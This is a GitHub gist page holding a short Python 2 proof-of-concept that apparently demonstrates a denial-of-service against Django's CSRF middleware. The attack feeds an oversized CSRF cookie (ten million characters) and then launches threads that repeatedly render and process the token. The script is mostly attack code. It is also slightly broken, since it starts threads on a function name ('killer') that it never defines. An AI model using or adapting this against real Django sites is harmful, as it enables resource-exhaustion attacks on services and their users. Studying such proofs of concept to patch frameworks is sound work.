Skip to content

Instantly share code, notes, and snippets.

@hirokiky
Created March 4, 2012 02:03
Show Gist options
  • Save hirokiky/1970016 to your computer and use it in GitHub Desktop.
Save hirokiky/1970016 to your computer and use it in GitHub Desktop.
Too log CSRF token: Django
import thread
from django.conf import settings
from django.core.context_processors import csrf
from django.http import HttpRequest, HttpResponse
from django.middleware.csrf import CsrfViewMiddleware
from django.template import RequestContext, Template
def token_view(request):
"""A view that uses {% csrf_token %}"""
context = RequestContext(request, processors=[csrf])
template = Template("{% csrf_token %}")
return HttpResponse(template.render(context))
class TestingHttpRequest(HttpRequest):
"""
A version of HttpRequest that allows us to change some things
more easily
"""
def is_secure(self):
return getattr(self, '_is_secure_override', False)
def atacker(req):
for _ in xrange(10):
resp = token_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, False)
def kill():
req = TestingHttpRequest()
req.COOKIES[settings.CSRF_COOKIE_NAME] = 'x' * 10000000
CsrfViewMiddleware().process_view(req, token_view, (), {})
for _ in xrange(10):
thread.start_new_thread(killer, (req,))
@bayramgeldiyevichh
Copy link

Hello

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment